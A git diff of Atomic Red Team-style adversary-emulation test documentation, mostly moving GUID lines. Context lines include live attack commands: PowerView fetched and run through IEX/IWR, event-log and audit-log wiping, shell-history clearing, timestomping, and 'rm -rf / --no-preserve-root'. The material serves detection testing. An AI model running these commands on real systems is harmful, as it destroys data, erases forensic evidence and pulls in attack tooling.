## Atomic Test #17 - ATHPowerShellCommandLineParameter -EncodedCommand parameter variations - -auto_generated_guid: 86a43bad-12e3-4e85-b97c-4d5cf25b95c3 - Executes powershell.exe with variations of the -EncodedCommand parameter + **Supported Platforms:** Windows +**auto_generated_guid:** 86a43bad-12e3-4e85-b97c-4d5cf25b95c3 + + + #### Inputs: @@ -689,13 +723,15 @@ Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
## Atomic Test #18 - ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments - -auto_generated_guid: 0d181431-ddf3-4826-8055-2dbf63ae848b - Executes powershell.exe with variations of the -EncodedCommand parameter with encoded arguments supplied + **Supported Platforms:** Windows +**auto_generated_guid:** 0d181431-ddf3-4826-8055-2dbf63ae848b + + + #### Inputs: diff --git a/atomics/T1059.002/T1059.002.md b/atomics/T1059.002/T1059.002.md index ac93ee4f..404aff72 100644 --- a/atomics/T1059.002/T1059.002.md +++ b/atomics/T1059.002/T1059.002.md @@ -16,16 +16,18 @@ Adversaries may abuse AppleScript to execute various behaviors, such as interact
## Atomic Test #1 - AppleScript - -auto_generated_guid: 3600d97d-81b9-4171-ab96-e4386506e2c2 - Shell Script with AppleScript. The encoded python script will perform an HTTP GET request to 127.0.0.1:80 with a session cookie of "t3VhVOs/DyCcDTFzIKanRxkvk3I=", unless 'Little Snitch' is installed, in which case it will just exit. You can use netcat to listen for the connection and verify execution, e.g. use "nc -l 80" in another terminal window before executing this test and watch for the request. Reference: https://github.com/EmpireProject/Empire + **Supported Platforms:** macOS +**auto_generated_guid:** 3600d97d-81b9-4171-ab96-e4386506e2c2 + + + diff --git a/atomics/T1059.003/T1059.003.md b/atomics/T1059.003/T1059.003.md index 920ce645..4a96ddef 100644 --- a/atomics/T1059.003/T1059.003.md +++ b/atomics/T1059.003/T1059.003.md @@ -16,13 +16,15 @@ Adversaries may leverage [cmd](https://attack.mitre.org/software/S0106) to execu
## Atomic Test #1 - Create and Execute Batch Script - -auto_generated_guid: 9e8894c0-50bd-4525-a96c-d4ac78ece388 - Creates and executes a simple batch script. Upon execution, CMD will briefly launch to run the batch script then close again. + **Supported Platforms:** Windows +**auto_generated_guid:** 9e8894c0-50bd-4525-a96c-d4ac78ece388 + + + #### Inputs: @@ -65,13 +67,15 @@ Set-Content -Path #{script_path} -Value "#{command_to_execute}"
## Atomic Test #2 - Writes text to a file and displays it. - -auto_generated_guid: 127b4afe-2346-4192-815c-69042bec570e - Writes text to a file and display the results. This test is intended to emulate the dropping of a malicious file to disk. + **Supported Platforms:** Windows +**auto_generated_guid:** 127b4afe-2346-4192-815c-69042bec570e + + + #### Inputs: diff --git a/atomics/T1059.004/T1059.004.md b/atomics/T1059.004/T1059.004.md index db220177..c5280a49 100644 --- a/atomics/T1059.004/T1059.004.md +++ b/atomics/T1059.004/T1059.004.md @@ -16,13 +16,15 @@ Adversaries may abuse Unix shells to execute various commands or payloads. Inter
## Atomic Test #1 - Create and Execute Bash Shell Script - -auto_generated_guid: 7e7ac3ed-f795-4fa5-b711-09d6fbe9b873 - Creates and executes a simple bash script. + **Supported Platforms:** macOS, Linux +**auto_generated_guid:** 7e7ac3ed-f795-4fa5-b711-09d6fbe9b873 + + + #### Inputs: @@ -54,15 +56,17 @@ rm #{script_path}
## Atomic Test #2 - Command-Line Interface - -auto_generated_guid: d0c88567-803d-4dca-99b4-7ce65e7b257c - Using Curl to download and pipe a payload to Bash. NOTE: Curl-ing to Bash is generally a bad idea if you don't control the server. Upon successful execution, sh will download via curl and wget the specified payload (echo-art-fish.sh) and set a marker file in `/tmp/art-fish.txt`. + **Supported Platforms:** macOS, Linux +**auto_generated_guid:** d0c88567-803d-4dca-99b4-7ce65e7b257c + + + diff --git a/atomics/T1059.005/T1059.005.md b/atomics/T1059.005/T1059.005.md index e78a44ae..41960a40 100644 --- a/atomics/T1059.005/T1059.005.md +++ b/atomics/T1059.005/T1059.005.md @@ -18,15 +18,17 @@ Adversaries may use VB payloads to execute malicious commands. Common malicious
## Atomic Test #1 - Visual Basic script execution to gather local computer information - -auto_generated_guid: 1620de42-160a-4fe5-bbaf-d3fef0181ce9 - Visual Basic execution test, execute vbscript via PowerShell. When successful, system information will be written to $env:TEMP\T1059.005.out.txt. + **Supported Platforms:** Windows +**auto_generated_guid:** 1620de42-160a-4fe5-bbaf-d3fef0181ce9 + + + #### Inputs: @@ -70,17 +72,19 @@ Copy-Item $env:TEMP\sys_info.vbs #{vbscript} -Force
## Atomic Test #2 - Encoded VBS code execution - -auto_generated_guid: e8209d5f-e42d-45e6-9c2f-633ac4f1eefa - This module takes an encoded VBS script and executes it from within a malicious document. By default, upon successful execution a message box will pop up displaying "ART T1059.005" A note regarding this module, due to the way that this module utilizes "ScriptControl" a 64bit version of Microsoft Office is required. You can validate this by opening WinWord -> File -> Account -> About Word + **Supported Platforms:** Windows +**auto_generated_guid:** e8209d5f-e42d-45e6-9c2f-633ac4f1eefa + + + @@ -123,15 +127,17 @@ Write-Host "You will need to install Microsoft Word (64-bit) manually to meet th
## Atomic Test #3 - Extract Memory via VBA - -auto_generated_guid: 8faff437-a114-4547-9a60-749652a03df6 - This module attempts to emulate malware authors utilizing well known techniques to extract data from memory/binary files. To do this we first create a string in memory then pull out the pointer to that string. Finally, it uses this pointer to copy the contents of that memory location to a file stored in the $env:TEMP\atomic_t1059_005_test_output.bin. + **Supported Platforms:** Windows +**auto_generated_guid:** 8faff437-a114-4547-9a60-749652a03df6 + + + #### Inputs: diff --git a/atomics/T1059.006/T1059.006.md b/atomics/T1059.006/T1059.006.md index 216ee5fb..db4b1100 100644 --- a/atomics/T1059.006/T1059.006.md +++ b/atomics/T1059.006/T1059.006.md @@ -16,13 +16,15 @@ Python comes with many built-in packages to interact with the underlying system,
## Atomic Test #1 - Execute shell script via python's command mode arguement - -auto_generated_guid: 3a95cdb2-c6ea-4761-b24e-02b71889b8bb - Download and execute shell script and write to file then execute locally using Python -c (command mode) + **Supported Platforms:** Linux +**auto_generated_guid:** 3a95cdb2-c6ea-4761-b24e-02b71889b8bb + + + #### Inputs: @@ -67,13 +69,15 @@ pip install requests
## Atomic Test #2 - Execute Python via scripts (Linux) - -auto_generated_guid: 6c4d1dcb-33c7-4c36-a8df-c6cfd0408be8 - Create Python file (.py) that downloads and executes shell script via executor arguments + **Supported Platforms:** Linux +**auto_generated_guid:** 6c4d1dcb-33c7-4c36-a8df-c6cfd0408be8 + + + #### Inputs: @@ -129,13 +133,15 @@ pip install requests
## Atomic Test #3 - Execute Python via Python executables (Linux) - -auto_generated_guid: 0b44d79b-570a-4b27-a31f-3bf2156e5eaa - Create Python file (.py) then compile to binary (.pyc) that downloads an external malicious script then executes locally using the supplied executor and arguments + **Supported Platforms:** Linux +**auto_generated_guid:** 0b44d79b-570a-4b27-a31f-3bf2156e5eaa + + + #### Inputs: diff --git a/atomics/T1069.001/T1069.001.md b/atomics/T1069.001/T1069.001.md index 05acf215..56654c95 100644 --- a/atomics/T1069.001/T1069.001.md +++ b/atomics/T1069.001/T1069.001.md @@ -16,13 +16,15 @@ Commands such as net localgroup of the [Net](https://attack.mitre.o
## Atomic Test #1 - Permission Groups Discovery (Local) - -auto_generated_guid: 952931a4-af0b-4335-bbbe-73c8c5b327ae - Permission Groups Discovery + **Supported Platforms:** macOS, Linux +**auto_generated_guid:** 952931a4-af0b-4335-bbbe-73c8c5b327ae + + + @@ -44,14 +46,16 @@ if [ -x "$(command -v groups)" ]; then groups; else echo "groups is missing from
## Atomic Test #2 - Basic Permission Groups Discovery Windows (Local) - -auto_generated_guid: 1f454dd6-e134-44df-bebb-67de70fb6cd8 - Basic Permission Groups Discovery for Windows. This test will display some errors if run on a computer not connected to a domain. Upon execution, domain information will be displayed. + **Supported Platforms:** Windows +**auto_generated_guid:** 1f454dd6-e134-44df-bebb-67de70fb6cd8 + + + @@ -72,14 +76,16 @@ net localgroup "Administrators"
## Atomic Test #3 - Permission Groups Discovery PowerShell (Local) - -auto_generated_guid: a580462d-2c19-4bc7-8b9a-57a41b7d3ba4 - Permission Groups Discovery utilizing PowerShell. This test will display some errors if run on a computer not connected to a domain. Upon execution, domain information will be displayed. + **Supported Platforms:** Windows +**auto_generated_guid:** a580462d-2c19-4bc7-8b9a-57a41b7d3ba4 + + + diff --git a/atomics/T1069.002/T1069.002.md b/atomics/T1069.002/T1069.002.md index 228f6b73..2ea99ae1 100644 --- a/atomics/T1069.002/T1069.002.md +++ b/atomics/T1069.002/T1069.002.md @@ -26,14 +26,16 @@ Commands such as net group /domain of the [Net](https://attack.mitr
## Atomic Test #1 - Basic Permission Groups Discovery Windows (Domain) - -auto_generated_guid: dd66d77d-8998-48c0-8024-df263dc2ce5d - Basic Permission Groups Discovery for Windows. This test will display some errors if run on a computer not connected to a domain. Upon execution, domain information will be displayed. + **Supported Platforms:** Windows +**auto_generated_guid:** dd66d77d-8998-48c0-8024-df263dc2ce5d + + + @@ -56,14 +58,16 @@ net group "enterprise admins" /domain
## Atomic Test #2 - Permission Groups Discovery PowerShell (Domain) - -auto_generated_guid: 6d5d8c96-3d2a-4da9-9d6d-9a9d341899a7 - Permission Groups Discovery utilizing PowerShell. This test will display some errors if run on a computer not connected to a domain. Upon execution, domain information will be displayed. + **Supported Platforms:** Windows +**auto_generated_guid:** 6d5d8c96-3d2a-4da9-9d6d-9a9d341899a7 + + + #### Inputs: @@ -88,14 +92,16 @@ get-ADPrincipalGroupMembership #{user} | select name
## Atomic Test #3 - Elevated group enumeration using net group (Domain) - -auto_generated_guid: 0afb5163-8181-432e-9405-4322710c0c37 - Runs "net group" command including command aliases and loose typing to simulate enumeration/discovery of high value domain groups. This test will display some errors if run on a computer not connected to a domain. Upon execution, domain information will be displayed. + **Supported Platforms:** Windows +**auto_generated_guid:** 0afb5163-8181-432e-9405-4322710c0c37 + + + @@ -118,13 +124,15 @@ net group "BUILTIN\Backup Operators" /doma
## Atomic Test #4 - Find machines where user has local admin access (PowerView) - -auto_generated_guid: a2d71eee-a353-4232-9f86-54f4288dd8c1 - Find machines where user has local admin access (PowerView). Upon execution, progress and info about each host in the domain being scanned will be displayed. + **Supported Platforms:** Windows +**auto_generated_guid:** a2d71eee-a353-4232-9f86-54f4288dd8c1 + + + @@ -145,13 +153,15 @@ IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d29
## Atomic Test #5 - Find local admins on all machines in domain (PowerView) - -auto_generated_guid: a5f0d9f8-d3c9-46c0-8378-846ddd6b1cbd - Enumerates members of the local Administrators groups across all machines in the domain. Upon execution, information about each machine will be displayed. + **Supported Platforms:** Windows +**auto_generated_guid:** a5f0d9f8-d3c9-46c0-8378-846ddd6b1cbd + + + @@ -172,13 +182,15 @@ IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d29
## Atomic Test #6 - Find Local Admins via Group Policy (PowerView) - -auto_generated_guid: 64fdb43b-5259-467a-b000-1b02c00e510a - takes a computer and determines who has admin rights over it through GPO enumeration. Upon execution, information about the machine will be displayed. + **Supported Platforms:** Windows +**auto_generated_guid:** 64fdb43b-5259-467a-b000-1b02c00e510a + + + #### Inputs: @@ -204,13 +216,15 @@ IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d29
## Atomic Test #7 - Enumerate Users Not Requiring Pre Auth (ASRepRoast) - -auto_generated_guid: 870ba71e-6858-4f6d-895c-bb6237f6121b - When successful, accounts that do not require kerberos pre-auth will be returned + **Supported Platforms:** Windows +**auto_generated_guid:** 870ba71e-6858-4f6d-895c-bb6237f6121b + + + @@ -251,14 +265,16 @@ Add-WindowsCapability -Online -Name "Rsat.ActiveDirectory.DS-LDS.Tools~~~~0.0.1.
## Atomic Test #8 - Adfind - Query Active Directory Groups - -auto_generated_guid: 48ddc687-82af-40b7-8472-ff1e742e8274 - Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory Groups reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html + **Supported Platforms:** Windows +**auto_generated_guid:** 48ddc687-82af-40b7-8472-ff1e742e8274 + + + #### Inputs: diff --git a/atomics/T1070.001/T1070.001.md b/atomics/T1070.001/T1070.001.md index 81e61b56..4f9e6f5f 100644 --- a/atomics/T1070.001/T1070.001.md +++ b/atomics/T1070.001/T1070.001.md @@ -22,13 +22,15 @@ These logs may also be cleared through other mechanisms, such as the event viewe
## Atomic Test #1 - Clear Logs - -auto_generated_guid: e6abb60e-26b8-41da-8aae-0c35174b0967 - Upon execution this test will clear Windows Event Logs. Open the System.evtx logs at C:\Windows\System32\winevt\Logs and verify that it is now empty. + **Supported Platforms:** Windows +**auto_generated_guid:** e6abb60e-26b8-41da-8aae-0c35174b0967 + + + #### Inputs: @@ -53,15 +55,17 @@ wevtutil cl #{log_name}
## Atomic Test #2 - Delete System Logs Using Clear-EventLog - -auto_generated_guid: b13e9306-3351-4b4b-a6e8-477358b0b498 - Clear event logs using built-in PowerShell commands. Upon successful execution, you should see the list of deleted event logs Upon execution, open the Security.evtx logs at C:\Windows\System32\winevt\Logs and verify that it is now empty or has very few logs in it. + **Supported Platforms:** Windows +**auto_generated_guid:** b13e9306-3351-4b4b-a6e8-477358b0b498 + + + @@ -83,15 +87,17 @@ Get-EventLog -list
## Atomic Test #3 - Clear Event Logs via VBA - -auto_generated_guid: 1b682d84-f075-4f93-9a89-8a8de19ffd6e - This module utilizes WMI via VBA to clear the Security and Backup eventlogs from the system. Elevation is required for this module to execute properly, otherwise WINWORD will throw an "Access Denied" error + **Supported Platforms:** Windows +**auto_generated_guid:** 1b682d84-f075-4f93-9a89-8a8de19ffd6e + + + diff --git a/atomics/T1070.002/T1070.002.md b/atomics/T1070.002/T1070.002.md index 2715a141..e75d68d2 100644 --- a/atomics/T1070.002/T1070.002.md +++ b/atomics/T1070.002/T1070.002.md @@ -23,13 +23,15 @@
## Atomic Test #1 - rm -rf - -auto_generated_guid: 989cc1b1-3642-4260-a809-54f9dd559683 - Delete system and audit logs + **Supported Platforms:** macOS, Linux +**auto_generated_guid:** 989cc1b1-3642-4260-a809-54f9dd559683 + + + @@ -50,13 +52,15 @@ sudo rm -rf /private/var/audit/*
## Atomic Test #2 - Overwrite Linux Mail Spool - -auto_generated_guid: 1602ff76-ed7f-4c94-b550-2f727b4782d4 - This test overwrites the Linux mail spool of a specified user. This technique was used by threat actor Rocke during the exploitation of Linux web servers. + **Supported Platforms:** Linux +**auto_generated_guid:** 1602ff76-ed7f-4c94-b550-2f727b4782d4 + + + #### Inputs: @@ -81,13 +85,15 @@ echo 0> /var/spool/mail/#{username}
## Atomic Test #3 - Overwrite Linux Log - -auto_generated_guid: d304b2dc-90b4-4465-a650-16ddd503f7b5 - This test overwrites the specified log. This technique was used by threat actor Rocke during the exploitation of Linux web servers. + **Supported Platforms:** Linux +**auto_generated_guid:** d304b2dc-90b4-4465-a650-16ddd503f7b5 + + + #### Inputs: diff --git a/atomics/T1070.003/T1070.003.md b/atomics/T1070.003/T1070.003.md index 4152771e..8d5e8582 100644 --- a/atomics/T1070.003/T1070.003.md +++ b/atomics/T1070.003/T1070.003.md @@ -40,13 +40,15 @@ Adversaries may run the PowerShell command Clear-History to flush t
## Atomic Test #1 - Clear Bash history (rm) - -auto_generated_guid: a934276e-2be5-4a36-93fd-98adbb5bd4fc - Clears bash history via rm + **Supported Platforms:** Linux, macOS +**auto_generated_guid:** a934276e-2be5-4a36-93fd-98adbb5bd4fc + + + @@ -66,13 +68,15 @@ rm ~/.bash_history
## Atomic Test #2 - Clear Bash history (echo) - -auto_generated_guid: cbf506a5-dd78-43e5-be7e-a46b7c7a0a11 - Clears bash history via rm + **Supported Platforms:** Linux +**auto_generated_guid:** cbf506a5-dd78-43e5-be7e-a46b7c7a0a11 + + + @@ -92,13 +96,15 @@ echo "" > ~/.bash_history
## Atomic Test #3 - Clear Bash history (cat dev/null) - -auto_generated_guid: b1251c35-dcd3-4ea1-86da-36d27b54f31f - Clears bash history via cat /dev/null + **Supported Platforms:** Linux, macOS +**auto_generated_guid:** b1251c35-dcd3-4ea1-86da-36d27b54f31f + + + @@ -118,13 +124,15 @@ cat /dev/null > ~/.bash_history
## Atomic Test #4 - Clear Bash history (ln dev/null) - -auto_generated_guid: 23d348f3-cc5c-4ba9-bd0a-ae09069f0914 - Clears bash history via a symlink to /dev/null + **Supported Platforms:** Linux, macOS +**auto_generated_guid:** 23d348f3-cc5c-4ba9-bd0a-ae09069f0914 + + + @@ -144,13 +152,15 @@ ln -sf /dev/null ~/.bash_history
## Atomic Test #5 - Clear Bash history (truncate) - -auto_generated_guid: 47966a1d-df4f-4078-af65-db6d9aa20739 - Clears bash history via truncate + **Supported Platforms:** Linux +**auto_generated_guid:** 47966a1d-df4f-4078-af65-db6d9aa20739 + + + @@ -170,13 +180,15 @@ truncate -s0 ~/.bash_history
## Atomic Test #6 - Clear history of a bunch of shells - -auto_generated_guid: 7e6721df-5f08-4370-9255-f06d8a77af4c - Clears the history of a bunch of different shell types by setting the history size to zero + **Supported Platforms:** Linux, macOS +**auto_generated_guid:** 7e6721df-5f08-4370-9255-f06d8a77af4c + + + @@ -198,13 +210,15 @@ history -c
## Atomic Test #7 - Clear and Disable Bash History Logging - -auto_generated_guid: 784e4011-bd1a-4ecd-a63a-8feb278512e6 - Clears the history and disable bash history logging of the current shell and future shell sessions + **Supported Platforms:** Linux, macOS +**auto_generated_guid:** 784e4011-bd1a-4ecd-a63a-8feb278512e6 + + + @@ -233,13 +247,15 @@ set -o history
## Atomic Test #8 - Use Space Before Command to Avoid Logging to History - -auto_generated_guid: 53b03a54-4529-4992-852d-a00b4b7215a6 - Using a space before a command causes the command to not be logged in the Bash History file + **Supported Platforms:** Linux, macOS +**auto_generated_guid:** 53b03a54-4529-4992-852d-a00b4b7215a6 + + + @@ -260,13 +276,15 @@ whoami
## Atomic Test #9 - Disable Bash History Logging with SSH -T - -auto_generated_guid: 5f8abd62-f615-43c5-b6be-f780f25790a1 - Keeps history clear and stays out of lastlog,wtmp,btmp ssh -T keeps the ssh client from catching a proper TTY, which is what usually gets logged on lastlog + **Supported Platforms:** Linux +**auto_generated_guid:** 5f8abd62-f615-43c5-b6be-f780f25790a1 + + + @@ -304,13 +322,15 @@ yum -y install sshpass
## Atomic Test #10 - Prevent Powershell History Logging - -auto_generated_guid: 2f898b81-3e97-4abb-bc3f-a95138988370 - Prevents Powershell history + **Supported Platforms:** Windows +**auto_generated_guid:** 2f898b81-3e97-4abb-bc3f-a95138988370 + + + @@ -334,13 +354,15 @@ Set-PSReadLineOption -HistorySaveStyle SaveIncrementally
## Atomic Test #11 - Clear Powershell History by Deleting History File - -auto_generated_guid: da75ae8d-26d6-4483-b0fe-700e4df4f037 - Clears Powershell history + **Supported Platforms:** Windows +**auto_generated_guid:** da75ae8d-26d6-4483-b0fe-700e4df4f037 + + + diff --git a/atomics/T1070.004/T1070.004.md b/atomics/T1070.004/T1070.004.md index 783f63dc..f5bd9b21 100644 --- a/atomics/T1070.004/T1070.004.md +++ b/atomics/T1070.004/T1070.004.md @@ -30,13 +30,15 @@ There are tools available from the host operating system to perform cleanup, but
## Atomic Test #1 - Delete a single file - Linux/macOS - -auto_generated_guid: 562d737f-2fc6-4b09-8c2a-7f8ff0828480 - Delete a single file from the temporary directory + **Supported Platforms:** Linux, macOS +**auto_generated_guid:** 562d737f-2fc6-4b09-8c2a-7f8ff0828480 + + + #### Inputs: @@ -61,13 +63,15 @@ rm -f #{file_to_delete}
## Atomic Test #2 - Delete an entire folder - Linux/macOS - -auto_generated_guid: a415f17e-ce8d-4ce2-a8b4-83b674e7017e - Recursively delete the temporary directory and all files contained within it + **Supported Platforms:** Linux, macOS +**auto_generated_guid:** a415f17e-ce8d-4ce2-a8b4-83b674e7017e + + + #### Inputs: @@ -92,13 +96,15 @@ rm -rf #{folder_to_delete}
## Atomic Test #3 - Overwrite and delete a file with shred - -auto_generated_guid: 039b4b10-2900-404b-b67f-4b6d49aa6499 - Use the `shred` command to overwrite the temporary file and then delete it + **Supported Platforms:** Linux +**auto_generated_guid:** 039b4b10-2900-404b-b67f-4b6d49aa6499 + + + #### Inputs: @@ -123,14 +129,16 @@ shred -u #{file_to_shred}
## Atomic Test #4 - Delete a single file - Windows cmd - -auto_generated_guid: 861ea0b4-708a-4d17-848d-186c9c7f17e3 - Delete a single file from the temporary directory using cmd.exe. Upon execution, no output will be displayed. Use File Explorer to verify the file was deleted. + **Supported Platforms:** Windows +**auto_generated_guid:** 861ea0b4-708a-4d17-848d-186c9c7f17e3 + + + #### Inputs: @@ -167,14 +175,16 @@ echo deleteme_T1551.004 >> #{file_to_delete}
## Atomic Test #5 - Delete an entire folder - Windows cmd - -auto_generated_guid: ded937c4-2add-42f7-9c2c-c742b7a98698 - Recursively delete a folder in the temporary directory using cmd.exe. Upon execution, no output will be displayed. Use File Explorer to verify the folder was deleted. + **Supported Platforms:** Windows +**auto_generated_guid:** ded937c4-2add-42f7-9c2c-c742b7a98698 + + + #### Inputs: @@ -211,13 +221,15 @@ mkdir #{folder_to_delete}
## Atomic Test #6 - Delete a single file - Windows PowerShell - -auto_generated_guid: 9dee89bd-9a98-4c4f-9e2d-4256690b0e72 - Delete a single file from the temporary directory using Powershell. Upon execution, no output will be displayed. Use File Explorer to verify the file was deleted. + **Supported Platforms:** Windows +**auto_generated_guid:** 9dee89bd-9a98-4c4f-9e2d-4256690b0e72 + + + #### Inputs: @@ -254,13 +266,15 @@ New-Item -Path #{file_to_delete} | Out-Null
## Atomic Test #7 - Delete an entire folder - Windows PowerShell - -auto_generated_guid: edd779e4-a509-4cba-8dfa-a112543dbfb1 - Recursively delete a folder in the temporary directory using Powershell. Upon execution, no output will be displayed. Use File Explorer to verify the folder was deleted. + **Supported Platforms:** Windows +**auto_generated_guid:** edd779e4-a509-4cba-8dfa-a112543dbfb1 + + + #### Inputs: @@ -297,13 +311,15 @@ New-Item -Path #{folder_to_delete} -Type Directory | Out-Null
## Atomic Test #8 - Delete Filesystem - Linux - -auto_generated_guid: f3aa95fe-4f10-4485-ad26-abf22a764c52 - This test deletes the entire root filesystem of a Linux system. This technique was used by Amnesia IoT malware to avoid analysis. This test is dangerous and destructive, do NOT use on production equipment. + **Supported Platforms:** Linux +**auto_generated_guid:** f3aa95fe-4f10-4485-ad26-abf22a764c52 + + + @@ -323,14 +339,16 @@ rm -rf / --no-preserve-root > /dev/null 2> /dev/null
## Atomic Test #9 - Delete Prefetch File - -auto_generated_guid: 36f96049-0ad7-4a5f-8418-460acaeb92fb - Delete a single prefetch file. Deletion of prefetch files is a known anti-forensic technique. To verify execution, Run "(Get-ChildItem -Path "$Env:SystemRoot\prefetch\*.pf" | Measure-Object).Count" before and after the test to verify that the number of prefetch files decreases by 1. + **Supported Platforms:** Windows +**auto_generated_guid:** 36f96049-0ad7-4a5f-8418-460acaeb92fb + + + @@ -350,17 +368,19 @@ Remove-Item -Path (Join-Path "$Env:SystemRoot\prefetch\" (Get-ChildItem -Path "$
## Atomic Test #10 - Delete TeamViewer Log Files - -auto_generated_guid: 69f50a5f-967c-4327-a5bb-e1a9a9983785 - Adversaries may delete TeamViewer log files to hide activity. This should provide a high true-positive alert ration. This test just places the files in a non-TeamViewer folder, a detection would just check for a deletion event matching the TeamViewer log file format of TeamViewer_##.log. Upon execution, no output will be displayed. Use File Explorer to verify the folder was deleted. https://twitter.com/SBousseaden/status/1197524463304290305?s=20 + **Supported Platforms:** Windows +**auto_generated_guid:** 69f50a5f-967c-4327-a5bb-e1a9a9983785 + + + #### Inputs: diff --git a/atomics/T1070.005/T1070.005.md b/atomics/T1070.005/T1070.005.md index f784ce96..c27abeb0 100644 --- a/atomics/T1070.005/T1070.005.md +++ b/atomics/T1070.005/T1070.005.md @@ -14,13 +14,15 @@
## Atomic Test #1 - Add Network Share - -auto_generated_guid: 14c38f32-6509-46d8-ab43-d53e32d2b131 - Add a Network Share utilizing the command_prompt + **Supported Platforms:** Windows +**auto_generated_guid:** 14c38f32-6509-46d8-ab43-d53e32d2b131 + + + #### Inputs: @@ -46,13 +48,15 @@ net share test=#{share_name} /REMARK:"test share" /CACHE:No
## Atomic Test #2 - Remove Network Share - -auto_generated_guid: 09210ad5-1ef2-4077-9ad3-7351e13e9222 - Removes a Network Share utilizing the command_prompt + **Supported Platforms:** Windows +**auto_generated_guid:** 09210ad5-1ef2-4077-9ad3-7351e13e9222 + + + #### Inputs: @@ -77,13 +81,15 @@ net share #{share_name} /delete
## Atomic Test #3 - Remove Network Share PowerShell - -auto_generated_guid: 0512d214-9512-4d22-bde7-f37e058259b3 - Removes a Network Share utilizing PowerShell + **Supported Platforms:** Windows +**auto_generated_guid:** 0512d214-9512-4d22-bde7-f37e058259b3 + + + #### Inputs: diff --git a/atomics/T1070.006/T1070.006.md b/atomics/T1070.006/T1070.006.md index 11fb1413..752ef9b0 100644 --- a/atomics/T1070.006/T1070.006.md +++ b/atomics/T1070.006/T1070.006.md @@ -26,13 +26,15 @@ Timestomping may be used along with file name [Masquerading](https://attack.mitr
## Atomic Test #1 - Set a file's access timestamp - -auto_generated_guid: 5f9113d5-ed75-47ed-ba23-ea3573d05810 - Stomps on the access timestamp of a file + **Supported Platforms:** Linux, macOS +**auto_generated_guid:** 5f9113d5-ed75-47ed-ba23-ea3573d05810 + + + #### Inputs: @@ -57,13 +59,15 @@ touch -a -t 197001010000.00 #{target_filename}
## Atomic Test #2 - Set a file's modification timestamp - -auto_generated_guid: 20ef1523-8758-4898-b5a2-d026cc3d2c52 - Stomps on the modification timestamp of a file + **Supported Platforms:** Linux, macOS +**auto_generated_guid:** 20ef1523-8758-4898-b5a2-d026cc3d2c52 + + + #### Inputs: @@ -88,16 +92,18 @@ touch -m -t 197001010000.00 #{target_filename}
## Atomic Test #3 - Set a file's creation timestamp - -auto_generated_guid: 8164a4a6-f99c-4661-ac4f-80f5e4e78d2b - Stomps on the create timestamp of a file Setting the creation timestamp requires changing the system clock and reverting. Sudo or root privileges are required to change date. Use with caution. + **Supported Platforms:** Linux, macOS +**auto_generated_guid:** 8164a4a6-f99c-4661-ac4f-80f5e4e78d2b + + + #### Inputs: @@ -126,15 +132,17 @@ stat #{target_filename}
## Atomic Test #4 - Modify file timestamps using reference file - -auto_generated_guid: 631ea661-d661-44b0-abdb-7a7f3fc08e50 - Modifies the `modify` and `access` timestamps using the timestamps of a specified reference file. This technique was used by the threat actor Rocke during the compromise of Linux web servers. + **Supported Platforms:** Linux, macOS +**auto_generated_guid:** 631ea661-d661-44b0-abdb-7a7f3fc08e50 + + + #### Inputs: @@ -160,14 +168,16 @@ touch -acmr #{reference_file_path} #{target_file_path}
## Atomic Test #5 - Windows - Modify file creation timestamp with PowerShell - -auto_generated_guid: b3b2c408-2ff0-4a33-b89b-1cb46a9e6a9c - Modifies the file creation timestamp of a specified file. This technique was seen in use by the Stitch RAT. To verify execution, use File Explorer to view the Properties of the file and observe that the Created time is the year 1970. + **Supported Platforms:** Windows +**auto_generated_guid:** b3b2c408-2ff0-4a33-b89b-1cb46a9e6a9c + + + #### Inputs: @@ -210,14 +220,16 @@ Set-Content #{file_path} -Value "T1551.006 Timestomp" -Force | Out-Null
## Atomic Test #6 - Windows - Modify file last modified timestamp with PowerShell - -auto_generated_guid: f8f6634d-93e1-4238-8510-f8a90a20dcf2 - Modifies the file last modified timestamp of a specified file. This technique was seen in use by the Stitch RAT. To verify execution, use File Explorer to view the Properties of the file and observe that the Modified time is the year 1970. + **Supported Platforms:** Windows +**auto_generated_guid:** f8f6634d-93e1-4238-8510-f8a90a20dcf2 + + + #### Inputs: @@ -260,14 +272,16 @@ Set-Content #{file_path} -Value "T1551.006 Timestomp" -Force | Out-Null
## Atomic Test #7 - Windows - Modify file last access timestamp with PowerShell - -auto_generated_guid: da627f63-b9bd-4431-b6f8-c5b44d061a62 - Modifies the last access timestamp of a specified file. This technique was seen in use by the Stitch RAT. To verify execution, use File Explorer to view the Properties of the file and observe that the Accessed time is the year 1970. + **Supported Platforms:** Windows +**auto_generated_guid:** da627f63-b9bd-4431-b6f8-c5b44d061a62 + + + #### Inputs: @@ -310,17 +324,19 @@ Set-Content #{file_path} -Value "T1551.006 Timestomp" -Force | Out-Null
## Atomic Test #8 - Windows - Timestomp a File - -auto_generated_guid: d7512c33-3a75-4806-9893-69abc3ccdd43 - Timestomp kxwn.lock. Successful execution will include the placement of kxwn.lock in #{file_path} and execution of timestomp.ps1 to modify the time of the .lock file. [Mitre ATT&CK Evals](https://github.com/mitre-attack/attack-arsenal/blob/master/adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/defensive-evasion/4a2ad84e-a93a-4b2e-b1f0-c354d6a41278.yml) + **Supported Platforms:** Windows +**auto_generated_guid:** d7512c33-3a75-4806-9893-69abc3ccdd43 + + + #### Inputs: diff --git a/atomics/T1070/T1070.md b/atomics/T1070/T1070.md index 159510d9..d91dd8db 100644 --- a/atomics/T1070/T1070.md +++ b/atomics/T1070/T1070.md @@ -12,14 +12,16 @@ These actions may interfere with event collection, reporting, or other notificat
